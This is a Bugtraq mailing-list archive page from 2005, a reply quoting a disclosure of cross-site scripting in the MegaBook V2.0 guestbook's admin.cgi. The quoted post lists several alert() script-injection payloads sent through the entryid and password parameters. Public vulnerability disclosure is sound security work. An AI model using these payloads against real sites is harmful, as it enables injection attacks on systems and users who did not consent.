Bugtraq mailing list archives
Re: MegaBook V2.0 - Cross Site Scripting Exploit
From: Morning Wood <wood () exploitlabs com>
Date: 6 May 2005 07:18:31 -0000
In-Reply-To: <20050505104551.23441.qmail () www securityfocus com> umm.. http://exploitlabs.com/files/advisories/EXPL-A-2003-011-megabook-2.0.txt
Subject: MegaBook V2.0 - Cross Site Scripting Exploit The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) I have tested the script with the following query: ?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script> I have also tested the script with theses POST variables: action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script> action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script> action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script> action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script> action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script> Yours, SpyHat
Current thread:
- MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 05)
- <Possible follow-ups>
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Morning Wood (May 06)
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 09)